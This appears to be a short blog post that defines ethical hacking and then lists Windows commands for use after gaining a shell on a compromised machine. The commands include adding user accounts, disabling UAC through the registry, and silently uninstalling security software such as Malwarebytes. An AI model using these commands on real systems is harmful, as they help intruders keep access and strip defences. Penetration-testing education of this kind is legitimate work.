Ethical Hacking

Ethical hacking is the process of attempting to bypass an organizations security system in order to find any weaknesses or vulnerabilities that could be exploited by a real malicious hacker.  The information discovered and gathered during ethical hacking can help an organization improve it’s security posture by highlighting security holes that need to be patched.

In order for ethical hacking to be ethical the ethical hacker must have explicit written permission to attempt to exploit the security system.  The ethical hacker must also agree to disclose to the organization all vulnerabilities found so that the organization may fix them.  Without permission from the organization and this agreement any hacking activity would definitely be considered unethical and possibly criminal.

Useful Windows Commands

So after we’ve gained our first shell we’ll need to execute a series of commands on the compromised system in order to gain further control and solidify our footprint.  The following are some of the more common Windows commands in no particular order.  I’ll keep updating this list as needed 🙂

CREATE NEW ACCOUNT 

net user /add username password

or alternatively if you do not want to enter the password in plain text, run the following:

net user /add username *

and then enter the password in twice when prompted at the command line

SEE CURRENT USER

whoami

SEE CURRENT USER’S PERMISSIONS 

whoami /PRIV

SEE LOCAL ADMIN GROUP MEMBERS 

net localgroup administrators

SEE LOCAL USERS GROUP MEMBERS

net localgroup users

REMOTE SHUTDOWN OR RESTART 

shutdown -r -m \\computername

CONFIGURING UAC

Disable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Enable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

SEEING INSTALLED APPLICATIONS

wmic product Name — (this will enumerate all installed software on the system)

To narrow these results or check for specific applications try playing with the following:

wmic product where “Name like %Malwarebytes%” get Name, Version

wmic product where “Name=’Malwarebytes’” get Name, Version

TO UNINSTALL APPLICATIONS SILENTLY

wmic product where “Name=’Malwarebytes’” call uninstall /nointeractive